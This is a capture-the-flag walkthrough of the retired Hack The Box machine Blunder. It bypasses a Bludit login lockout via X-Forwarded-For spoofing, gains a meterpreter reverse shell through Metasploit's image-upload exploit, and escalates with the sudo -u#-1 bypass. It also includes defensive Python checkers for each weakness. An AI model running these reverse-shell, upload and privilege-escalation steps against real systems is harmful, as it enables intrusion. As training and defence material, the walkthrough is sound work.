HTB Walkthrough: Blunder (retired)

Blunder is a retired box on HTB.

Hostname: Blunder | Difficulty Level: Easy | Operating System: Linux

We can see Port 80 is open.

Running gobuster to enumerate pages on the webserver:

When you browse to http://10.10.10.191/admin, you see a web portal. The wordlist we used above was for directory listing. Let us now use a wordlist for web page listing, which can be found here.

In gobuster, the ‘-b 403,404’ option skips responses with HTTP status 403 and 404. Make sure to list every 4XX status applicable to your search, or it will throw an error. Gobuster found two interesting files:

install.php: it reveals the text “Bludit is already installed ;)”.

todo.txt: it hints at ‘fergus’ as one of the users.

If you view the source code for http://10.10.10.191, you will find a hint that the Bludit version is 3.9.2.

Right-click http://10.10.10.191 > view source code

Searchsploit revealed exploits that require credentials (authenticated exploits). A Google search reveals that Bludit has an exploit (Bludit CMS Version 3.9.2 Brute Force Protection Bypass) that bypasses the brute-force protection (you can attempt either Hydra or multiple manual logins to confirm that your IP address gets blacklisted by the brute-force protection).

The linked write-up reveals that the ‘X-Forwarded-For’ HTTP header can be used to bypass the brute-force protection, because the protection depends on, and trusts, the value of the ‘X-Forwarded-For’ header as the client’s IP address. We write a Python script to bypass the brute-force protection.

The code is self-explanatory. Please refer to ippsec’s video for a detailed explanation. Some blocks of the code are explained below:

Capture valid session for GET

Fire up burpsuite to understand what the request parameters should be.

Your GET request will hit ‘http://10.10.10.191/admin’ (line-3) and it will return the web portal page, whose source reveals how the CSRF token is sent as an input.

Source code of http://10.10.10.191/admin

If you observe the tokenCSRF value, it is hexadecimal; hence we use the regex ‘[a-f0-9]*’ (line-4). The cookie is ‘BLUDIT-KEY’ (line-6), which can be found by sending a GET request and capturing it in burpsuite.

Burpsuite GET request

POST method

After we have received valid session values from the init_session() method, we need to POST the form with the user and password while bypassing the brute-force protection.

Burpsuite POST request by submitting random username/password to http://10.10.10.191/admin

In the bludit.py script, line-23 reflects the values that can be observed in the Burpsuite POST request above (Burpsuite’s line-14). Observe in Burpsuite that the POST request is sent to ‘admin/login’ (Burpsuite’s line-1).

POST method

By trial and error, you will find that the successful login is not status code 200 (line-39). You will get the ‘Username or password incorrect’ error for an incorrect login (line-42). You will get the ‘IP address has been blocked. Try again in few minutes’ error after multiple attempts from the same IP address (line-44). You will need to create a dictionary file (words) of passwords by crawling ‘http://10.10.10.191’ with the ‘cewl’ tool (line-51).

cewl http://10.10.10.191/ > words

When the script is executed, you will get the output below:

bludit.py output: Status Code & Credentials

Once you get the credentials from bludit.py, log in at ‘http://10.10.10.191/admin/login’.
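Why the lockout described above never triggers, and what a corrected check looks like, as an added example (not code from this walkthrough or from Bludit): a toy login limiter keyed first on the raw X-Forwarded-For value, then on an address resolved only through known proxies. The threshold, the proxy address and all function names are assumptions made for the demo.

```python
import ipaddress
from collections import Counter

MAX_FAILURES = 10  # assumed lockout threshold for this demo
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}  # hypothetical reverse proxy

def client_ip_naive(peer, headers):
    """Weak form: believe whatever the client put in X-Forwarded-For."""
    xff = headers.get("X-Forwarded-For", "")
    return xff.split(",")[0].strip() or peer

def client_ip_hardened(peer, headers):
    """Honour X-Forwarded-For only when the TCP peer is a known proxy, then
    walk the chain right to left to the first hop that is not a proxy."""
    if ipaddress.ip_address(peer) not in TRUSTED_PROXIES:
        return peer
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed chain: fall back to the socket address
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return peer

class LoginLimiter:
    def __init__(self, resolver):
        self.resolver = resolver
        self.failures = Counter()  # failed logins per resolved address

    def failed_login(self, peer, headers):
        key = self.resolver(peer, headers)
        self.failures[key] += 1
        return self.failures[key] >= MAX_FAILURES  # True once blocked

def first_block(resolver, attempts=50, peer="203.0.113.7"):
    """Constructed traffic: one socket peer, a new header value per attempt.
    Returns the attempt number at which the limiter blocks, or None."""
    limiter = LoginLimiter(resolver)
    for n in range(1, attempts + 1):
        headers = {"X-Forwarded-For": f"198.51.100.{n}"}
        if limiter.failed_login(peer, headers):
            return n
    return None

if __name__ == "__main__":
    print("naive resolver blocks at:", first_block(client_ip_naive))
    print("hardened resolver blocks at:", first_block(client_ip_hardened))
```

With the naive resolver every attempt lands in a fresh counter, so the limiter never reaches its threshold; the hardened resolver ignores the header from an untrusted peer and blocks at the tenth failure.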

To understand the exploit, use the ‘set Proxies’ step and ‘run’ the exploit without setting the payload.

Steps are self-explanatory:

msf5 > search bludit
msf5 > use 0
msf5 exploit(linux/http/bludit_upload_images_exec) > show options
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set Proxies http:127.0.0.1:8080
msf5 exploit(linux/http/bludit_upload_images_exec) > set ReverseAllowProxy true
msf5 exploit(linux/http/bludit_upload_images_exec) > run

If you keep on forwarding the request in burpsuite (Proxy>Intercept), you will come across the section below. Observe that the filename is a .png file but the content is PHP code.

Burpsuite

If you click ‘forward’ for the same request in burpsuite (Proxy>Intercept), you will come across the section below. You will see that the filename is changed to “.htaccess”. Observe ‘AddType application/x-httpd-php .png’, which means PNG files are executed as PHP.

Burpsuite

The last request is:

GET /bl-content/tmp/fLkRrBxEGs.png HTTP/1.1
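The two uploads seen in the proxy leave recognisable traces on disk. The following added example (not part of the original walkthrough or of the Metasploit module) audits an upload directory for image-named files without image magic bytes or with a PHP open tag, and for .htaccess files that map a type to PHP. The sample directory is constructed inline; function names are assumptions.

```python
import os
import re
import tempfile

IMAGE_MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8",
               ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}
# Directives that can make Apache hand a non-.php file to the PHP handler.
HANDLER_RE = re.compile(rb"^\s*(AddType|AddHandler|SetHandler)\b.*php",
                        re.IGNORECASE | re.MULTILINE)

def audit_upload_dir(root):
    """Return {relative path: [reasons]} for suspicious files under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read(65536)
            reasons = []
            ext = os.path.splitext(name)[1].lower()
            if name == ".htaccess" and HANDLER_RE.search(data):
                reasons.append("htaccess maps a file type to PHP")
            if ext in IMAGE_MAGIC:
                if not data.startswith(IMAGE_MAGIC[ext]):
                    reasons.append("image extension, wrong magic bytes")
                if b"<?php" in data.lower():
                    reasons.append("PHP open tag inside image file")
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def demo():
    """Build a constructed upload directory mirroring the requests above."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "logo.png": IMAGE_MAGIC[".png"] + b"\x00" * 16,  # benign image
            "fLkRrBxEGs.png": b"<?php /* constructed placeholder */ ?>",
            ".htaccess": b"AddType application/x-httpd-php .png\n",
        }
        for name, content in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(content)
        return audit_upload_dir(root)

if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, "->", "; ".join(reasons))
```

Serving the upload directory with AllowOverride None keeps an uploaded .htaccess from taking effect at all.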

Continuing with the Metasploit exploitation: in the previous Metasploit session, enter the commands below:

msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.14.37
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

You will get a meterpreter shell.

You will get a hashed password for user ‘hugo’ from the path below:

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<hashed-password>

Use the ‘hash-identifier’ tool to identify the type of hash, i.e. SHA1 (exploitable). Use crackstation.net to crack the password for the hugo user. Once you have that password, you will get the user.txt flag.

Check what you can do with sudo.

hugo@blunder:~$ sudo -l
sudo -l
Password: <hugo-password>

Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash

hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1

Use the sudo exploit below and you will get a root shell and the root.txt flag.

hugo@blunder:~$ sudo -u#-1 /bin/bash
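From the defender's side, the rule and the command above can both be checked for. This added example (not from the original walkthrough) flags ‘sudo -l’ rules whose run-as list pairs ALL with a negated user, and sudo log lines whose run-as user is the numeric ID -1. The log lines are constructed, and the assumption is that sudo records the run-as user in a USER= field as ‘#-1’ or its unsigned 32-bit form.

```python
import re

RUNAS_RE = re.compile(r"^\s*\(([^)]*)\)")
LOG_USER_RE = re.compile(r"\bUSER=(\S+)")
# "#-1" and its unsigned 32-bit form; assumed spellings in the log's USER= field
SUSPECT_RUNAS = {"#-1", "#4294967295"}

def risky_runas_rules(sudo_l_output):
    """Return rule lines whose run-as user list is 'ALL' plus an exclusion."""
    risky = []
    for line in sudo_l_output.splitlines():
        m = RUNAS_RE.match(line)
        if not m:
            continue
        # The part before ':' is the user list; after it comes the group list.
        users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
        if "ALL" in users and any(u.startswith("!") for u in users):
            risky.append(line.strip())
    return risky

def suspicious_runas_events(log_lines):
    """Return log lines where the run-as user is the numeric ID -1."""
    hits = []
    for line in log_lines:
        m = LOG_USER_RE.search(line)
        if m and m.group(1) in SUSPECT_RUNAS:
            hits.append(line)
    return hits

# 'sudo -l' output as shown in the walkthrough.
SUDO_L = """User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""

# Constructed sudo log lines for illustration; 'backup' is a hypothetical user.
LOG = [
    "Jun  1 10:02:11 blunder sudo: hugo : TTY=pts/0 ; PWD=/home/hugo ; "
    "USER=backup ; COMMAND=/bin/bash",
    "Jun  1 10:03:40 blunder sudo: hugo : TTY=pts/0 ; PWD=/home/hugo ; "
    "USER=#-1 ; COMMAND=/bin/bash",
]

if __name__ == "__main__":
    print("risky rules:", risky_runas_rules(SUDO_L))
    print("suspicious events:", suspicious_runas_events(LOG))
```

Listing the permitted run-as users explicitly, rather than ALL minus an exclusion, removes the flagged rule pattern.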
